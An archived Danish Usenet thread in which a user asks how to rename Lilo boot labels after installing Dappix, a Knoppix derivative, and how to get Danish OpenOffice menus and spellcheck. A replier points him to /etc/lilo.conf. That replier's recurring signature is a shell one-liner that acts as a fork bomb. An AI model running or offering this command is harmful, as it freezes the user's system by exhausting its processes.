redigere i Lilo (Dappix) + dansk Open Off~
Fra : Hansen & Bennetsen

Dato : 08-11-03 14:48

Så lykkedes det at installere Dappix 3.3 alias dansk Knoppix alis Klaus
Knoppers Debian-derivat. Og også denne gang er jeg imponeret over, at
skidtet er installeret, alle enheder fundet og oppe at køre på nettet på 25
min.

Jeg har foreløbig to spørgsmål: Lilo starter op med, at jeg kan vælge mellem
hda og hdd.. På hda ligger så en bootprompt fra Knoppix 3.1 og her kan jeg
så vælge mellem Linux, W98 og Win XP. Af hensyn til familien vil jeg gerne
have omdøbt hda til noget, de kan forstå, de skal vælge, hvis de vil videre
til XP. Hvordan redigerer jeg lige det?

Mærkeligt nok er det engelsk Open Office Org, der følger med Dappix. Jeg
ved, jeg kan hente en dansk stavekontrol, men hvordan installeres den
nemmest? Og kan jeg få danske menuer i OOO?

VH
Finn A. Hansen

Jeg vil anbefale andre at hente pakkemanageren Synaptic. Den er sg'u
tjekket.

Fra : Michal

Dato : 09-11-03 22:04

In news:3facf421$0$95072$edfadb0f@dread11.news.tele.dk,
Hansen & Bennetsen <villalulla@mail.tele.dk> wrote:

> [...]
> Klaus Knoppers Debian-derivat. Og også denne gang er jeg imponeret
> over, at skidtet er installeret, alle enheder fundet og oppe at køre

Er Dappix en installations-dist som debian, eller en linux-on-cd som
knoppix?

> [...]
> familien vil jeg gerne have omdøbt hda til noget, de kan forstå, de
> skal vælge, hvis de vil videre til XP. Hvordan redigerer jeg lige det?

Jeg har godt nok aldrig set lilo sige hvilke diske der er i maskinen... Så
vidt jeg ved laver man selv labelsne i /etc/lilo.conf hvorefter man kører
'lilo' for at installere bootloaderen med nye indstillinger.

F.eks. har jeg på min bærbare "linux-fb-16bpp", "linux-fb-24bpp", etc og på
servere bare en "linux" og en "linux-old" a'la debian. Noget man selv
indtaster i lilo.conf sammen med path til en kernel image.

Ved ikke helt med win9x/nt.

> Mærkeligt nok er det engelsk Open Office Org, der følger med Dappix.
> Jeg ved, jeg kan hente en dansk stavekontrol, men hvordan installeres
> den nemmest? Og kan jeg få danske menuer i OOO?

Det må en anden vist svare på... det program kan jeg slet ikke afvikle :)

> Jeg vil anbefale andre at hente pakkemanageren Synaptic. Den er sg'u
> tjekket.

a'la apt?

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Hansen & Bennetsen

Dato : 10-11-03 00:03

> Er Dappix en installations-dist som debian, eller en linux-on-cd som
> knoppix?

Den er (som) Knoppix, men installation sker nemt via shell: knx-hdinstall

a la apt?

Nej, med en smart GUI

Fra : Michal

Dato : 10-11-03 19:44

In news:3faec7ae$0$95023$edfadb0f@dread11.news.tele.dk,

> Den er (som) Knoppix, men installation sker nemt via shell:
> knx-hdinstall

smart :)

> a la apt?
>
> Nej, med en smart GUI

Over konsollen i fb? Eller en X?

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Hansen & Bennetsen

Dato : 10-11-03 20:18

> Over konsollen i fb? Eller en X?

Ikke forstået. Prøv selv at hente programmet.

VH
Finn A. Hansen

Fra : Michal

Dato : 10-11-03 20:52

In news:3fafe47f$0$95024$edfadb0f@dread11.news.tele.dk,

> Ikke forstået. Prøv selv at hente programmet.

Hehe, ok :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]